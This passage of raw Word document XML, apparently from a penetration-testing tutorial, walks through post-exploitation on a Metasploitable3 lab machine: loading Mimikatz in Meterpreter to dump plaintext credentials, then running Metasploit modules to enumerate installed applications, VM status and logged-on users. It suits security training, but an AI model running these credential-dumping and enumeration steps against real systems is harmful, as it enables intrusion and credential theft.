        <w:t xml:space="preserve"> Gathering ssh keys, GPG keys, source code, left behind “password.txt” file, Wireless client profile… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A100D" w14:textId="7AB2F45F" w:rsidR="005D0176" w:rsidRDefault="005D0176" w:rsidP="00137F97">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E55E50F" w14:textId="5FE175D9" w:rsidR="005D0176" w:rsidRPr="00137F97" w:rsidRDefault="005D0176" w:rsidP="00137F97">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Sometimes, attackers may find password history which follow a template (</w:t>
      </w:r>
      <w:r w:rsidR="00032E3E">
        <w:t xml:space="preserve">e.g. </w:t>
      </w:r>
      <w:r>
        <w:t>Telindus2015*, Telindus2016*, Telindus2017*, …) which can probably give the new access for 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12835E27" w14:textId="31B092D7" w:rsidR="00F50A9E" w:rsidRDefault="007A2F79" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The loading M</w:t>
      </w:r>
      <w:r w:rsidR="00F50A9E">
        <w:t>imikatz to retrieve passwords, we get interesting stuff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83B6B2" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; load mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A048DA7" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Loading extension mimikatz...Success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB01FB" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1047CA83" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D30AC47" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Mimikatz Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4DEB79" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>=================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F45F8" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3BF9BD" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Command           Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E87570" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -------           -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE4936" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    kerberos          Attempt to retrieve kerberos creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BA2AB" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    livessp           Attempt to retrieve livessp creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C2BF3" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mimikatz_command  Run a custom command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CEDB19" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    msv               Attempt to retrieve msv creds (hashes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B83568" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ssp               Attempt to retrieve ssp creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E5C333" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    tspkg             Attempt to retrieve tspkg creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341295D" w14:textId="554E7C4A" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="0021148E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    wdigest           Attempt to retrieve wdigest creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F031081" w14:textId="77777777" w:rsidR="0021148E" w:rsidRPr="0021148E" w:rsidRDefault="0021148E" w:rsidP="0021148E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE4E492" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E217EFD" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6611BAD3" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Retrieving kerberos credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513927DD" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kerberos credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB22C1" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>====================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30F4F1" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1731AF8C" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>AuthID     Package    Domain           User              Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68285A36" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------     -------    ------           ----              --------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19A6FA" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0;996      Negotiate  WORKGROUP        METASPLOITABLE3$  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D56E49" w14:textId="33AE1129" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0;39380    NTLM                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4C873" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;120922   NTLM       METASPLOITABLE3  sshd_server       D@rj33l1ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BACD21" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;1606354  NTLM       METASPLOITABLE3  vagrant           vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215C2D74" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68487309" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E720D71" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; tspkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A747A" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD350A6" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Retrieving tspkg credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C9D276" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>tspkg credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169BD0C3" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>=================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A47EC9" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA0DCD5" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>AuthID     Package    Domain           User              Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55449BF0" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------     -------    ------           ----              --------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6EC6C" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;120922   NTLM       METASPLOITABLE3  sshd_server       D@rj33l1ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698AAD8" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;1606354  NTLM       METASPLOITABLE3  vagrant           vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF28D6" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612E8A0F" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; wdigest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51734601" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E51650F" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Retrieving wdigest credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EE258" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>wdigest credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215E010B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>===================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5AC9E1" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFF9022" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>AuthID     Package    Domain           User              Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649488F" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------     -------    ------           ----              --------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C6F6B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;120922   NTLM       METASPLOITABLE3  sshd_server       D@rj33l1ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C6B8AD" w14:textId="1C469D4D" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0;1606354  NTLM       METASPLOITABLE3  vagrant           vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6B638B" w14:textId="77777777" w:rsidR="00032E3E" w:rsidRDefault="00032E3E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0D51D6" w14:textId="0B9B9337" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then doing some enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE6C4B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; run post/windows/gather/enum_applications </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BD6239" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776DEA8A" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Enumerating applications installed on METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB9510" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73225410" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Installed Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FFCE12" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E913D84" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F1B48A" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Name                                                            Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A7E5D5" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> ----                                                            -------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28CBBC" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 7-Zip 18.05 (x64)                                               18.05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1CBD57" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Java 8 Update 171                                               8.0.1710.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898AED6" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Java 8 Update 171 (64-bit)                                      8.0.1710.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B7C7BB" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="00B616D6" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CCA72C" w14:textId="137D15BE" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>5.2.12.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70360225" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> VMware Tools                                                    10.2.0.7253323</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD4A5D" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1AB49E" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8FDB47" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Results stored in: /root/.msf4/loot/20180705025545_default_192.168.22.30_host.application_878700.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC1060" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; run post/windows/gather/checkvm </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D2E0E" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8CC09B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Checking if METASPLOITABLE3 is a Virtual Machine .....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5B4FB" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] This is a VMware Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBCBD47" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; run post/windows/gather/enum_logged_on_users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B61A32" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6317BBFD" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Running against session 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093D239" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F48B1A" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Current Logged Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D895FB3" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>====================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A294E84" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB5D46D" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> SID                                          User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A33577" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ---                                          ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746BDDF" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> S-1-5-18                                     NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEECADC" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> S-1-5-21-91035301-3286527290-355893404-1002  METASPLOITABLE3\sshd_server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E93243" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3A141A" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E21E22B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Results saved in: /root/.msf4/loot/20180705025622_default_192.168.22.30_host.users.activ_897807.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE525B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DA3285" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Recently Logged Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED0DA67" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>=====================</w:t>
      </w:r>
    </w:p>
